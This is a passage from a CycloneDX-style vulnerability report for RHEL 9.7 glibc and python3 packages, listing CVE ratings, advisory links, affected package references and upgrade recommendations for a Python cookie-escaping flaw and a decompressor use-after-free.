          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6019",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        150
      ],
      "description": "http.cookies.Morsel.js_output() returns an inline <script> snippet and only escapes \" for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence </script> inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6019"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6019"
        },
        {
          "url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c"
        },
        {
          "url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104"
        },
        {
          "url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8"
        },
        {
          "url": "https://github.com/python/cpython/issues/90309"
        },
        {
          "url": "https://github.com/python/cpython/pull/148848"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6019"
        }
      ],
      "published": "2026-04-22T20:16:42+00:00",
      "updated": "2026-04-29T16:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6100",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        416,
        787
      ],
      "description": "Use-after-free (UAF) was possible in the `lzma.LZMADecompressor`, `bz2.BZ2Decompressor`, and `gzip.GzipFile` when a memory allocation fails with a `MemoryError` and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition.\n\nThe vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a `MemoryError` is raised during decompression. Programs that use the helper functions to one-shot decompress data, such as `lzma.decompress()`, `bz2.decompress()`, `gzip.decompress()`, and `zlib.decompress()`, are not affected, as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.",
      "recommendation": "Upgrade python-unversioned-command to version 3.9.25-3.el9_7.3; Upgrade python3 to version 3.9.25-3.el9_7.3; Upgrade python3-libs to version 3.9.25-3.el9_7.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6100"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/13/10"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10949"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6100"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-10949.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10949"
        },
        {
          "url": "https://github.com/python/cpython/commit/47128e64f98c3a20271138a98c2922bea2a3ee0e"
        },
        {
          "url": "https://github.com/python/cpython/commit/6a5f79c8d7bbf22b083b240910c7a8781a59437d"
        },
        {
          "url": "https://github.com/python/cpython/commit/8fc66aef6d7b3ae58f43f5c66f9366cc8cbbfcd2"
        },
        {
          "url": "https://github.com/python/cpython/commit/c3cf71c3366fe49acb776a639405c0eea6169c20"
        },
        {
          "url": "https://github.com/python/cpython/commit/e20c6c9667c99ecaab96e1a2b3767082841ffc8b"
        },
        {
          "url": "https://github.com/python/cpython/issues/148395"
        },
        {
          "url": "https://github.com/python/cpython/pull/148396"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-6100.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-11077.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/HTWB2Z6KT5QQX4RYEZAFININDHNOSIF3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6100"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6100"
        }
      ],
      "published": "2026-04-13T18:16:31+00:00",
      "updated": "2026-04-17T15:18:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.9.25-3.el9_7.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
